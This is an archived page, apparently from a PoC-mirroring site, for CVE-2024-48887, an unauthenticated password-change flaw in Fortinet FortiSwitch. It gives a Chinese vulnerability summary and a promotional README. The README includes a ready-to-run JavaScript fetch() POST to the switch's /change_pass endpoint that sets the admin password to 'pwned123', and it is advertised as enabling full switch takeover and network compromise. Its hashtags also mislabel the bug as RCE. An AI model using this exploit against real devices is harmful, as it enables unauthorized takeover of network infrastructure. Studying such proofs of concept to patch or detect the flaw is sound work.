Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-48887 PoC — Fortinet FortiSwitch 安全漏洞

Source
Associated Vulnerability
Title:Fortinet FortiSwitch 安全漏洞 (CVE-2024-48887)
Description:Fortinet FortiSwitch是美国飞塔(Fortinet)公司的一款网络交换机管理工具。 Fortinet FortiSwitch存在安全漏洞,该漏洞源于未经身份验证的密码更改,可能导致管理员密码被篡改。
Description
a lightweight JavaScript snippet showcasing how unauthorized password changes can be triggered on vulnerable Fortinet FortiSwitch GUI endpoints.
Readme
# CVE-2024-48887-FortiSwitch-Exploit
🚨 FortiSwitch CVE-2024-48887 PoC (JavaScript) 🚨

🔥 Just dropped a lightweight JavaScript snippet showcasing how unauthorized password changes can be triggered on vulnerable Fortinet FortiSwitch GUI endpoints.

🛠️ About the Vulnerability:
An attacker can craft a simple fetch() request to manipulate password settings without any auth, directly targeting /change_pass endpoint variants.

```
fetch('http://target-ip/change_pass', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({
    username: 'admin',
    newpass: 'pwned123',
    confirm: 'pwned123'
  })
})
.then(res => res.text())
.then(data => console.log('Response:', data));
```
💡 Impact: Full switch takeover, lateral movement potential, and network compromise.

📁 Repo: github.com/yourusername/CVE-2024-48887-FortiSwitch-Exploit
⭐ Star the repo & share it with your infosec folks!

📢 Follow the full breakdown and real-time alerts via @cybersecplayground

#JavaScript #infosec #bugbounty #CVE2024 #Fortinet #FortiSwitch #RCE #exploitdev #cybersecurity #PoC #github #OSINT #cybersecplayground

File Snapshot

[4.0K] /data/pocs/e045659ed047826627578ce2324612c745b27fe1 ├── [ 286] main.js └── [1.1K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.